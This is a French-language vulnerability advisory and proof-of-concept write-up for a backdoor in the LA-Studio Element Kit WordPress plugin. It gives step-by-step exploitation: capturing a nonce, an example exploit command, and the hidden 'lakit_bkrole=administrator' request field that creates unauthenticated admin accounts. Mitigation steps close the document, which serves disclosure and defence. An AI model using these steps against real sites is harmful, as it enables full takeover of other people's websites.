
Explication et payload de la récente vulnérabilité dans le plugin WordPress LA-Studio Element.
Analyse technique et Preuve de Concept (PoC) pour la backdoor critique découverte dans LA-Studio Element Kit pour Elementor (versions ≤ 1.5.6.3). Cette vulnérabilité permet la création non authentifiée de comptes administrateurs.
Une backdoor a été intentionnellement insérée dans la fonction ajax_register_handle par un ancien employé, permettant l'utilisation d'un paramètre caché pour élever les privilèges utilisateur lors de l'inscription.
Type de vulnérabilité : Autorisation inappropriée / Backdoor intentionnelle.
Fonction ciblée : ajax_register_handle.
Paramètre de la backdoor : lakit_bkrole.
Impact : Prise de contrôle totale du site.
Exigences clés :
Un nonce AJAX WordPress valide (_nonce).
Le paramètre lakit_bkrole défini sur administrator.
Capturer le nonce : Intercepter une requête d'inscription légitime ou inspecter le code source de la page pour trouver le _nonce de l'action lakit_ajax.

Exécuter l'exploit : Exécuter le script Python en fournissant l'URL cible, le nonce capturé et les identifiants souhaités.

Exemple de commande :
python CVE-2026-0920.py -u https://spoilhouses.s2-tastewp.com -n b935edabf2 -ua "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36" --user "john_admin" --passw "ComplexPass123"
Sortie du terminal :
Plaintext SUCCESS: john_admin created.
Résultat : Le nouvel utilisateur john_admin est visible dans le panneau Utilisateurs de WordPress avec le profil Administrateur.

La requête interceptée révèle comment la backdoor est déclenchée :
Point de terminaison : /wp-admin/admin-ajax.php.
Action : lakit_ajax.
Données malveillantes : La chaîne JSON dans le paramètre actions inclut explicitement "lakit_bkrole":"administrator", que le plugin traite pour accorder des privilèges complets sur le site.
🛠️ Atténuation Mise à jour : Mettre à niveau immédiatement vers la v1.6.0.
Audit : Examiner la table wp_users pour détecter tout administrateur non autorisé créé récemment, comme john_admin.
Nettoyage : Supprimer tout compte suspect trouvé et faire pivoter tous les mots de passe des administrateurs légitimes.